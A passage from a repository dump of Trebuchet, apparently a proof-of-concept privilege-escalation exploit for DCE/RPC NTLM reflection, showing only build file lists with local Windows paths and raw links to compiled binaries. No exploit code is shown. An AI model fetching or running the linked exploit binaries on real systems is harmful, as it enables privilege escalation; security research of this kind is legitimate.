https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Poc_DCERPCNTLMReflection_EoP.exe 2 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Poc_DCERPCNTLMReflection_EoP.pdb 3 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache 4 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources 5 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache 6 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.exe 7 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.pdb 8 | -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache 
-------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.exe -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.pdb -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.Properties.Resources.resources 
-------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.csprojResolveAssemblyReference.cache 2 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.Properties.Resources.resources 3 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.csproj.GenerateResource.Cache 4 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Trebuchet.exe 5 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Trebuchet.pdb 6 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.exe 7 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.pdb 8 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.exe 9 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.pdb 10 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\bin\Debug\Trebuchet.exe 11 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\bin\Debug\Trebuchet.pdb 12 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.csprojResolveAssemblyReference.cache 13 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.Properties.Resources.resources 14 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.csproj.GenerateResource.Cache 15 | 
C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.exe 16 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.pdb 17 | -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.exe -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.pdb -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/build.force: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/build.force 
-------------------------------------------------------------------------------- /Trebuchet/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Release/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.Properties.Resources.resources -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.csprojResolveAssemblyReference.cache 2 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.csproj.GenerateResource.Cache 3 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.Properties.Resources.resources 4 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\bin\Release\Trebuchet.exe 5 | 
C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\bin\Release\Trebuchet.pdb 6 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\bin\Release\Microsoft.VisualStudio.OLE.Interop.dll 7 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.exe 8 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.pdb 9 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.exe 10 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.pdb 11 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\bin\Release\Trebuchet.exe 12 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\bin\Release\Trebuchet.pdb 13 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\bin\Release\Microsoft.VisualStudio.OLE.Interop.dll 14 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.csprojResolveAssemblyReference.cache 15 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.Properties.Resources.resources 16 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.csproj.GenerateResource.Cache 17 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.exe 18 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.pdb 19 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\bin\Release\Trebuchet.exe 20 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\bin\Release\Trebuchet.pdb 21 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\bin\Release\Microsoft.VisualStudio.OLE.Interop.dll 22 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.csprojResolveAssemblyReference.cache 23 | 
C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.Properties.Resources.resources 24 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.csproj.GenerateResource.Cache 25 | -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.exe -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.pdb -------------------------------------------------------------------------------- /Trebuchet/request.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/request.bin 
--------------------------------------------------------------------------------